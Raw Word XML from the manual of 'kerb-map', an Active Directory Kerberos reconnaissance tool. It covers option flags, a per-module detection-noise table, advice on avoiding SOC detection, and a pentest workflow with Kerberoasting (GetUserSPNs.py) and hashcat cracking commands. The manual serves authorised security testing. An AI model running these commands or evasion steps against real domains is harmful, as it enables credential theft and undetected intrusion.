        </w:rPr>
        <w:t xml:space="preserve">8.3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Flag</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-o json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Export findings to JSON file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-o bloodhound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Export in BloodHound-compatible format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-o both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Export both JSON and BloodHound formats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--output-dir &lt;path&gt;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Directory for output files (default: current directory)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--quiet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Suppress terminal output (use with -o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4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Flag</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--aggressive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Enable aggressive CVE checks (ZeroLogon, PrintNightmare, PetitPotam)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--threads &lt;n&gt;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Number of concurrent LDAP queries (default: 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--timeout &lt;s&gt;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LDAP query timeout in seconds (default: 30)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--page-size &lt;n&gt;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LDAP paging size (default: 1000)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--no-color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Disable Rich formatting for piping to files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.5 Scan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Flag</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--list-scans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List all stored scans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--show-scan &lt;id&gt;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Display details of a specific scan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--diff-scans &lt;id1&gt; &lt;id2&gt;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Compare findings between two scans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--purge-history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Delete all stored scan data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 9 — Detection Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Noise Level by Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The table below summarises the OPSEC profile of each kerb-map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00"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="426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Module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Protocol</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Noise Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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SPN Scanner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LDAP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Low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Standard LDAP queries indistinguishable from admin tools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AS-REP Scanner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LDAP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Low</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Single LDAP search filter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Delegation Mapper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LDAP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Low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Queries delegation attributes on user/computer objects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User Enumerator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LDAP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Low</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Multiple LDAP queries but all use standard filters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Encryption Auditor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LDAP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Low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Queries msDS-SupportedEncryptionTypes attribute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Trust Mapper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LDAP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Low</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Queries trustedDomain objects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noPac Check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LDAP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Low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Version and hotfix check only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AD CS Check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LDAP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Low</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Queries certificate template and CA objects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MS14-068 Check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LDAP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Low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Domain functional level query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GPP Passwords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SMB</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Medium</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Reads files from SYSVOL (logged in file access audit)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Bronze Bit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LDAP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Low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Checks delegation accounts and DC patch level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Certifried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LDAP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Low</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Queries certificate template enrollment permissions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LDAP Signing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LDAP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Low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Queries rootDSE policies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ZeroLogon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RPC</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High</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Netlogon handshake with crafted credentials — triggers EDR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PrintNightmare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RPC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High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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Spoolss RPC call — triggers EDR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PetitPotam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RPC</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High</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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">EFSRPC call with UNC path — triggers EDR and firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Staying Quiet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When stealth is a priority, follow these guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Omit --aggressive — all high-noise modules require this flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use --threads 1 — serial LDAP queries are less likely to trigger rate-based detections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid --cves entirely during initial reconnaissance — save CVE checks for a follow-up scan after initial findings are reviewed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Run during business hours — LDAP queries from a legitimate user account blend with normal domain traffic during the workday.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Kerberos auth (-k) — avoids NTLM authentication events (Event ID 4624 Type 3) that some SOCs monitor closely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 The RC4 Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Many kerb-map findings depend on the continued prevalence of RC4-HMAC (etype 23) in Active Directory. RC4 is a stream cipher from 1987 that remains the default Kerberos encryption type in most AD environments for backward compatibility. Its use means that Kerberoasted hashes can be cracked at billions of attempts per second on consumer GPUs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Organisations that enforce AES-only Kerberos encryption (via GPO or msDS-SupportedEncryptionTypes) eliminate the most impactful Kerberoasting and AS-REP roasting attack paths. The encryption auditor module (--encryption) specifically highlights this gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 10 — Typical Engagement Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following workflow represents a typical kerb-map usage pattern during an authorised penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 Step 1: Initial Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a default scan to enumerate the attack surface without triggering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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Pass' -dc 10.10.10.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Step 2: Review Priority Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the ranked output. Focus on findings with scores above 70 first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 Step 3: Export for Graph Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Export to BloodHound to visualise attack paths from compromised SPNs and delegation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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Pass' -dc 10.10.10.1 -o bloodhound</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4 Step 4: CVE Checks (If Authorised)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If the rules of engagement permit aggressive testing, enable CVE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python kerb-map.py -d CORP.LOCAL -u jsmith -p 'Pass' -dc 10.10.10.1 --cves --aggressive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.5 Step 5: Follow Next Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the next-step commands generated by kerb-map for each finding. Prioritise by score and track exploitation success for the final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 Example: Kerberoast the highest-scored SPN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GetUserSPNs.py CORP.LOCAL/jsmith:'Pass' -request -outputfile kerberoast.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Example: Crack with hashcat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 11 — Project Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The kerb-map project follows a modular structure. Each scanner, auditor, and CVE check is implemented as an independent Python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kerb-map/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── kerb-map.py              # Main entry point and CLI argument parser</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── requirements.txt          # Python dependencies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── README.md                 # Project overview</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── config/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── scoring.py            # Score weights and thresholds</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── defaults.py           # Default settings (threads, timeout, page size)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── core/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── auth.py               # Authentication handler (password, hash, ccache)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── ldap_client.py        # LDAP connection and query wrapper</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── scorer.py             # Priority engine and next-step generator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── exporter.py           # JSON, BloodHound, and history export</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── modules/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── spn_scanner.py        # SPN discovery and Kerberoast scoring</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── asrep_scanner.py      # AS-REP roastable account detection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── delegation_mapper.py  # Unconstrained, constrained, RBCD mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── user_enumerator.py    # Privileged users, stale accounts, policy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── enc_auditor.py        # Encryption type auditing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── trust_mapper.py       # Domain and forest trust mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── cves/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── nopac.py              # CVE-2021-42278 / CVE-2021-42287</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── adcs.py               # AD CS ESC1–ESC8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── zerologon.py          # CVE-2020-1472</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
